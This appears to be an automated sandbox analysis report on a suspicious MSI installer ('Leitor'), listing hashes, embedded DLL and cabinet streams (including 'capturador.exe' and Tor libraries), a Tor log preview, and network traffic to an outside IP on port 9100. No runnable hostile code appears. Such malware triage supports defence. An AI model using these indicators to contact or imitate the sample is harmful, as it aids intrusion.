                                                MD5:1C1B49D76FD797F4DD10663B5DA52F25
                                                SHA1:9B8DE9D40724A6ACCFAF795E693CBEE03C137005
                                                SHA-256:6C8FCEA81CD4D902C37248D930589207080025A401DAE913B8EC806E796E9B2D
                                                SHA-512:F2CC37A1A80F8A81C74D6D8244FA6BEA7D21A0D8BD6C8D0F832998C8FAD8416FE4B7A301E6BBD910426C329D2FC37C9B9CA064E48432536A095471264407A49C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: Nov 23 21:01:45.311 [notice] Tor 0.4.5.9 (git-d0ed04d50e80fe1c) running on Windows 8 [or later] with Libevent 2.1.12-stable, OpenSSL 1.1.1k, Zlib 1.2.11, Liblzma N/A, Libzstd N/A and Unknown N/A as libc...Nov 23 21:01:45.311 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning..Nov 23 21:01:45.702 [notice] Read configuration file "C:\JQHPQS\AZJVGE"...Nov 23 21:01:45.702 [warn] Path for GeoIPFile (<default>) is relative and will resolve to C:\JQHPQS\<default>. Is this what you wanted?..Nov 23 21:01:45.702 [warn] Path for GeoIPv6File (<default>) is relative and will resolve to C:\JQHPQS\<default>. Is this what you wanted?..Nov 23 21:01:45.000 [warn] It looks like another Tor process is running with the same data directory. Waiting 5 seconds to see if it goes away...Nov 23 21:01:50.000 [err] No, it's still there. Exiting...Nov 23 21:01:50.000 [err] set_options(): Bug: Acting on config options left us in a broken st

                                                Static File Info

                                                General

                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Code page: 1252, Revision Number: {2E1E2189-2426-4422-848B-7807DE130F24}, Number of Words: 10, Subject: Leitor, Author: Leitor, Name of Creating Application: Leitor (Evaluation Installer), Template: ;1046, Comments: 3D9D53ED-FA8C-4FAA-9F38-69FDFB88AED5 (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Security: 0, Number of Pages: 200
                                                Entropy (8bit):7.868304383682033
                                                TrID:
                                                • Microsoft Windows Installer (77509/1) 52.18%
                                                • Windows SDK Setup Transform Script (63028/2) 42.43%
                                                • Generic OLE2 / Multistream Compound File (8008/1) 5.39%
                                                File name:YwZpT3p5Rh.msi
                                                File size:6378496
                                                MD5:5bfe975a60a97c93175c935c6d621e04
                                                SHA1:5bc30f0f540a957d2cc489bbce2c1a7f137069e0
                                                SHA256:464fe77f576d8273564bb5b7976b381855d962017f4da6b5a363af78bf788799
                                                SHA512:dea24ee9d249d715c1dac5976b4b023eb7c15e15b34a5ba31db7d8542c96553f7f0dd33cf86f00759c71dcd5200941eb364e04409dd3193d3e2270d6dffe1130
                                                SSDEEP:98304:s+QXPWTFcvpvyZYHAsmSdP33SfWww2wXaJ/Bci89ZaqN+rFzO4bj/y7dYWePRpwp:7Qex8NdP33SfWwwdKDFZj/QLePRpr3

                                                File Icon

                                                Icon Hash:a2a0b496b2caca72

                                                Static OLE Info

                                                General

                                                Document Type:OLE
                                                Number of OLE Files:1

                                                OLE File "YwZpT3p5Rh.msi"

                                                Indicators

                                                Has Summary Info:True
                                                Application Name:Leitor (Evaluation Installer)
                                                Encrypted Document:False
                                                Contains Word Document Stream:False
                                                Contains Workbook/Book Stream:False
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:
                                                Flash Objects Count:
                                                Contains VBA Macros:False

                                                Summary

                                                Code Page:1252
                                                Title:Installation Database
                                                Subject:Leitor
                                                Author:Leitor
                                                Keywords:Installer, MSI, Database
                                                Comments:3D9D53ED-FA8C-4FAA-9F38-69FDFB88AED5 (Evaluation Installer)
                                                Template:;1046
                                                Last Saved By:
                                                Revision Number:{2E1E2189-2426-4422-848B-7807DE130F24}
                                                Last Printed:2009-12-11 11:47:44.850000
                                                Create Time:2009-12-11 11:47:44.850000
                                                Last Saved Time:2020-09-18 14:06:51.913000
                                                Number of Pages:200
                                                Number of Words:10
                                                Creating Application:Leitor (Evaluation Installer)
                                                Security:0

                                                Streams

                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 536
                                                General
                                                Stream Path:\x5SummaryInformation
                                                File Type:data
                                                Stream Size:536
                                                Entropy:4.47330526009
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x15870\x18088, File Type: MS Windows icon resource - 1 icon, 16x16, 16 colors, Stream Size: 318
                                                General
                                                Stream Path:\x17163\x16689\x18229\x15870\x18088
                                                File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors
                                                Stream Size:318
                                                Entropy:2.03444158006
                                                Base64 Encoded:False
                                                Stream Path: \x17163\x16689\x18229\x15998\x18098\x17768\x17116\x17384\x16175\x17766\x17644\x15735\x17956\x16817\x16939\x18357\x17383\x18479, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 583136
                                                General
                                                Stream Path:\x17163\x16689\x18229\x15998\x18098\x17768\x17116\x17384\x16175\x17766\x17644\x15735\x17956\x16817\x16939\x18357\x17383\x18479
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Stream Size:583136
                                                Entropy:6.54843667385
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16318\x18483, File Type: MS Windows icon resource - 1 icon, 16x16, 16 colors, Stream Size: 318
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16318\x18483
                                                File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors
                                                Stream Size:318
                                                Entropy:2.03693614652
                                                Base64 Encoded:False
                                                Stream Path: \x17163\x16689\x18229\x16702\x16812\x17848\x16695\x17894\x16894\x17391, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 402912
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16702\x16812\x17848\x16695\x17894\x16894\x17391
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Stream Size:402912
                                                Entropy:6.38341870549
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14341\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x111, frames 3, Stream Size: 9319
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14341\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x111, frames 3
                                                Stream Size:9319
                                                Entropy:7.35217207818
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14658\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x74, frames 3, Stream Size: 5714
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14658\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x74, frames 3
                                                Stream Size:5714
                                                Entropy:7.42751568247
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14504\x14336\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x222, frames 3, Stream Size: 22946
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14504\x14336\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x222, frames 3
                                                Stream Size:22946
                                                Entropy:6.9205041088
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16766\x17508\x16945\x18357\x17645\x18474, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, frames 3, Stream Size: 4502
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x17645\x18474
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, frames 3
                                                Stream Size:4502
                                                Entropy:7.59347638402
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16830\x16880\x17199\x17329\x17764\x17589\x18490, File Type: MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel, Stream Size: 2862
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16830\x16880\x17199\x17329\x17764\x17589\x18490
                                                File Type:MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                Stream Size:2862
                                                Entropy:3.16043065194
                                                Base64 Encoded:False
                                                Stream Path: \x17163\x16689\x18229\x16830\x17458\x17395\x17896\x18476, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16830\x17458\x17395\x17896\x18476
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                                Stream Size:2998
                                                Entropy:4.35906224297
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16830\x17848\x17207\x17574\x18481, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16830\x17848\x17207\x17574\x18481
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                                Stream Size:2998
                                                Entropy:4.29856879699
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14341\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x593, frames 3, Stream Size: 27770
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14341\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x593, frames 3
                                                Stream Size:27770
                                                Entropy:7.06368048149
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14658\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x395, frames 3, Stream Size: 16673
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14658\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x395, frames 3
                                                Stream Size:16673
                                                Entropy:7.30816983161
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14504\x14336\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x1185, frames 3, Stream Size: 69692
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14504\x14336\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x1185, frames 3
                                                Stream Size:69692
                                                Entropy:6.08285538491
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16894\x16684\x17583\x18346\x17645\x18474, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x316, frames 3, Stream Size: 12626
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x17645\x18474
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x316, frames 3
                                                Stream Size:12626
                                                Entropy:7.45034483136
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x16958\x16827\x16687\x17200\x18470, File Type: MS Windows icon resource - 1 icon, 32x32, 16 colors, Stream Size: 766
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16958\x16827\x16687\x17200\x18470
                                                File Type:MS Windows icon resource - 1 icon, 32x32, 16 colors
                                                Stream Size:766
                                                Entropy:3.3484862649
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x17214\x17009\x18482, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 16x16, 16 colors, Stream Size: 1078
                                                General
                                                Stream Path:\x17163\x16689\x18229\x17214\x17009\x18482
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 16x16, 16 colors
                                                Stream Size:1078
                                                Entropy:2.86422695486
                                                Base64 Encoded:False
                                                Stream Path: \x17163\x16689\x18229\x17214\x17841\x17207\x17574\x18481, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998
                                                General
                                                Stream Path:\x17163\x16689\x18229\x17214\x17841\x17207\x17574\x18481
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                                Stream Size:2998
                                                Entropy:4.40653521205
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x17790\x17448\x18034\x16812\x18482, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998
                                                General
                                                Stream Path:\x17163\x16689\x18229\x17790\x17448\x18034\x16812\x18482
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                                Stream Size:2998
                                                Entropy:4.92283562852
                                                Base64 Encoded:False
                                                Stream Path: \x17163\x16689\x18229\x17790\x17640\x17188\x17205\x18470, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998
                                                General
                                                Stream Path:\x17163\x16689\x18229\x17790\x17640\x17188\x17205\x18470
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                                Stream Size:2998
                                                Entropy:4.6676615263
                                                Base64 Encoded:True
                                                Stream Path: \x17163\x16689\x18229\x17918\x16740\x16677\x17318, File Type: PC bitmap, Windows 3.x format, 1 x 200 x 24, Stream Size: 854
                                                General
                                                Stream Path:\x17163\x16689\x18229\x17918\x16740\x16677\x17318
                                                File Type:PC bitmap, Windows 3.x format, 1 x 200 x 24
                                                Stream Size:854
                                                Entropy:3.80253159876
                                                Base64 Encoded:False
                                                Stream Path: \x17191\x17334\x18305\x16678\x18469, File Type: Microsoft Cabinet archive data, 5018326 bytes, 14 files, Stream Size: 5018326
                                                General
                                                Stream Path:\x17191\x17334\x18305\x16678\x18469
                                                File Type:Microsoft Cabinet archive data, 5018326 bytes, 14 files
                                                Stream Size:5018326
                                                Entropy:7.99897032055
                                                Base64 Encoded:True
                                                Data ASCII:M S C F . . . . . . L . . . . . , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S i . c a p t u r a d o r . e x e . . . . . . . . . . . . R q . . c a p t u r a d o r . e x e . c o n f i g . . . 7 . . . . . . . . R ` v . l i b c r y p t o 1 _ 1 . d l l . L . . . . > 8 . . . . R ` v . l i b e v e n t _ c o r e 2 1 7 . d l l . . l . . . G . . . . R ` v . l i b e v e n t _ e x t r a 2 1 7 . d l l . . t . . . . Q . . . . R ` v . l i b e v e n t 2 1 7 . d l l . . . .
                                                Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 1312
                                                General
                                                Stream Path:\x18496\x15167\x17394\x17464\x17841
                                                File Type:data
                                                Stream Size:1312
                                                Entropy:5.12159211023
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x15518\x16925\x17915, File Type: data, Stream Size: 444
                                                General
                                                Stream Path:\x18496\x15518\x16925\x17915
                                                File Type:data
                                                Stream Size:444
                                                Entropy:5.37821201406
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: data, Stream Size: 89277
                                                General
                                                Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                                File Type:data
                                                Stream Size:89277
                                                Entropy:5.01588896469
                                                Base64 Encoded:True
                                                Data ASCII:A t t r i b u t e s D i r e c t o r y _ C o m p o n e n t I d C o m p o n e n t T y p e A c t i o n C o n d i t i o n S e q u e n c e C o s t F i n a l i z e C o s t I n i t i a l i z e T a b l e N a m e I n s t a l l F i n a l i z e I n s t a l l I n i t i a l i z e I n s t a l l V a l i d a t e A d v t E x e c u t e S e q u e n c e C r e a t e S h o r t c u t s M s i P u b l i s h A s s e m b l i e s P u b l i s h C o m p o n e n t s P u b l i s h F e a t u r e s P u b l i s h P r o d u c t R e g i s t e
                                                Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 7516
                                                General
                                                Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                                File Type:data
                                                Stream Size:7516
                                                Entropy:3.46343255879
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 72
                                                General
                                                Stream Path:\x18496\x16255\x16740\x16943\x18486
                                                File Type:data
                                                Stream Size:72
                                                Entropy:4.4568407108
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16383\x17380\x16876\x17892\x17580\x18481, File Type: data, Stream Size: 3936
                                                General
                                                Stream Path:\x18496\x16383\x17380\x16876\x17892\x17580\x18481
                                                File Type:data
                                                Stream Size:3936
                                                Entropy:3.301139152
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481, File Type: data, Stream Size: 16
                                                General
                                                Stream Path:\x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481
                                                File Type:data
                                                Stream Size:16
                                                Entropy:2.5
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16667\x17191\x15090\x17912\x17591\x18481, File Type: data, Stream Size: 36
                                                General
                                                Stream Path:\x18496\x16667\x17191\x15090\x17912\x17591\x18481
                                                File Type:data
                                                Stream Size:36
                                                Entropy:3.64160416787
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16778\x17207\x17522\x16925\x17915, File Type: data, Stream Size: 420
                                                General
                                                Stream Path:\x18496\x16778\x17207\x17522\x16925\x17915
                                                File Type:data
                                                Stream Size:420
                                                Entropy:5.00034491149
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 48
                                                General
                                                Stream Path:\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                File Type:data
                                                Stream Size:48
                                                Entropy:3.38186998233
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 66
                                                General
                                                Stream Path:\x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472
                                                File Type:data
                                                Stream Size:66
                                                Entropy:3.70987593702
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 72
                                                General
                                                Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                                File Type:data
                                                Stream Size:72
                                                Entropy:3.44607361183
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 56
                                                General
                                                Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                                File Type:data
                                                Stream Size:56
                                                Entropy:2.45183873051
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 16
                                                General
                                                Stream Path:\x18496\x16911\x17892\x17784\x18472
                                                File Type:data
                                                Stream Size:16
                                                Entropy:2.57781953111
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16918\x17191\x18468, File Type: MIPSEB Ucode, Stream Size: 14
                                                General
                                                Stream Path:\x18496\x16918\x17191\x18468
                                                File Type:MIPSEB Ucode
                                                Stream Size:14
                                                Entropy:1.95021206491
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x16925\x17915\x17884\x17404\x18472, File Type: data, Stream Size: 48
                                                General
                                                Stream Path:\x18496\x16925\x17915\x17884\x17404\x18472
                                                File Type:data
                                                Stream Size:48
                                                Entropy:3.05708832738
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17100\x16808\x15086\x18162, File Type: data, Stream Size: 12
                                                General
                                                Stream Path:\x18496\x17100\x16808\x15086\x18162
                                                File Type:data
                                                Stream Size:12
                                                Entropy:1.89624062518
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17163\x16689\x18229, File Type: data, Stream Size: 84
                                                General
                                                Stream Path:\x18496\x17163\x16689\x18229
                                                File Type:data
                                                Stream Size:84
                                                Entropy:3.09807935569
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 12
                                                General
                                                Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                                File Type:data
                                                Stream Size:12
                                                Entropy:2.68872187554
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17165\x17380\x17074, File Type: data, Stream Size: 616
                                                General
                                                Stream Path:\x18496\x17165\x17380\x17074
                                                File Type:data
                                                Stream Size:616
                                                Entropy:4.09066265815
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17167\x16943, File Type: data, Stream Size: 280
                                                General
                                                Stream Path:\x18496\x17167\x16943
                                                File Type:data
                                                Stream Size:280
                                                Entropy:3.82523055055
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 438
                                                General
                                                Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                File Type:data
                                                Stream Size:438
                                                Entropy:5.7389715587
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 186
                                                General
                                                Stream Path:\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
                                                File Type:data
                                                Stream Size:186
                                                Entropy:4.99002323032
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17547\x17906\x17910\x16693\x17651\x17768\x15518\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 54
                                                General
                                                Stream Path:\x18496\x17547\x17906\x17910\x16693\x17651\x17768\x15518\x16924\x17972\x17512\x16934
                                                File Type:data
                                                Stream Size:54
                                                Entropy:3.91556689971
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: data, Stream Size: 168
                                                General
                                                Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                                File Type:data
                                                Stream Size:168
                                                Entropy:2.6648612726
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17548\x17905\x17589\x15151\x17522\x17191\x17207\x17522, File Type: data, Stream Size: 72
                                                General
                                                Stream Path:\x18496\x17548\x17905\x17589\x15151\x17522\x17191\x17207\x17522
                                                File Type:data
                                                Stream Size:72
                                                Entropy:3.28528343517
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17548\x17905\x17589\x15279\x16953\x17905, File Type: data, Stream Size: 1536
                                                General
                                                Stream Path:\x18496\x17548\x17905\x17589\x15279\x16953\x17905
                                                File Type:data
                                                Stream Size:1536
                                                Entropy:4.88493439924
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17548\x17905\x17589\x18479, File Type: data, Stream Size: 7280
                                                General
                                                Stream Path:\x18496\x17548\x17905\x17589\x18479
                                                File Type:data
                                                Stream Size:7280
                                                Entropy:4.55112516549
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17630\x17770\x16868\x18472, File Type: data, Stream Size: 32
                                                General
                                                Stream Path:\x18496\x17630\x17770\x16868\x18472
                                                File Type:data
                                                Stream Size:32
                                                Entropy:2.97310613006
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17740\x16680\x16951\x17551\x16879\x17768, File Type: data, Stream Size: 4
                                                General
                                                Stream Path:\x18496\x17740\x16680\x16951\x17551\x16879\x17768
                                                File Type:data
                                                Stream Size:4
                                                Entropy:1.0
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17742\x17589\x18485, File Type: data, Stream Size: 2572
                                                General
                                                Stream Path:\x18496\x17742\x17589\x18485
                                                File Type:data
                                                Stream Size:2572
                                                Entropy:6.51935970753
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 336
                                                General
                                                Stream Path:\x18496\x17753\x17650\x17768\x18231
                                                File Type:data
                                                Stream Size:336
                                                Entropy:5.01600705417
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: data, Stream Size: 264
                                                General
                                                Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                                File Type:data
                                                Stream Size:264
                                                Entropy:3.60348374612
                                                Base64 Encoded:False
                                                Stream Path: \x18496\x17998\x17512\x15799\x17636\x17203\x17073, File Type: data, Stream Size: 128
                                                General
                                                Stream Path:\x18496\x17998\x17512\x15799\x17636\x17203\x17073
                                                File Type:data
                                                Stream Size:128
                                                Entropy:3.8274882892
                                                Base64 Encoded:False

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 23, 2021 21:01:42.212894917 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.212913036 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.212928057 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.212939978 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.212955952 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.212976933 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.212991953 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.213017941 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.213032007 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.213047028 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.213057041 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.213080883 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.213339090 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.316265106 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.320816994 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.382123947 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382157087 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382179022 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382230043 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382281065 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.382339001 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.382414103 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382428885 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382452965 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382467985 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382483006 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.382508039 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382545948 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.382580996 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382596970 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382612944 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.382635117 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.382858038 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382886887 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382905960 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382927895 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382941961 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.382966995 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382982969 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.382992983 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.383007050 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.383155107 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.383183956 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.383199930 CET910049775205.185.127.35192.168.2.5
